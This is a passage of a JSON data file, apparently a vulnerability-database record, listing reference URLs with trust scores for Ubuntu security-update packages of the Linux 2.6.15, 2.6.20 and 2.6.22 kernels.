        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc_2.6.20-17.12_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-386_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-686_2.6.15-52.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-52.67.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc-smp_2.6.20-17.12_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-server-bigiron_2.6.20-17.12_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-legacy-kernel-source_1.0.7184+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-52.67_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-386_2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-generic_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new_1.0.9755+2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-386-di_2.6.15-52.10_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-server_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc64-smp_2.6.20-17.12_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-powerpc-di_2.6.20.6-17.31_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-rt_2.6.22-15.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-sparc64-di_2.6.22-15.39_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-amd64-server_2.6.15-52.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/fglrx-control_8.37.6+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-generic_2.6.22-15.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-k7_2.6.15-52.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new-dev_1.0.9755+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.10_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-sparc64-smp_2.6.15-52.67_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/avm-fritz-firmware-2.6.22-15_3.11+2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx_1.0.9639+2.6.22.4-15.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-sparc64-smp_2.6.22.4-15.11_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-powerpc64-smp_2.6.15-52.67_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-virtual_2.6.22-15.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-rt_2.6.22-15.16_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-generic_2.6.22-15.39_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/avm-fritz-kernel-source_3.11+2.6.22.4-15.11_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-sparc64_2.6.15-52.67_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-15-rt_2.6.22-15.54_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-lpia-di_2.6.22-15.54_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4-15.11.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-sparc64-di_2.6.15-52.67_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-cell-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-server_2.6.15-52.10_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-lpia_2.6.22-15.54_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-generic-di_2.6.20.6-17.31_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-server_2.6.22-15.54_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/avm-fritz-kernel-source_3.11+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx_7.0.0-8.25.18+2.6.15.12-52.3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-sparc64-di_2.6.22-15.54_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-52.67_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-52-386-di_2.6.15.12-52.3_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-386_2.6.20.6-17.31_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-17.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4-15.11.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-ume_2.6.22-15.39_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx_1.0.9631+2.6.20.6-17.31_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-generic-di_2.6.20-17.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-generic-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-386-di_2.6.20-17.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-powerpc-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-powerpc64-smp_2.6.22-15.54_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-powerpc64-smp-di_2.6.22-15.54_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-sparc64-smp_2.6.15-52.67_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb"
      },
      {
        "trust": 0.1,
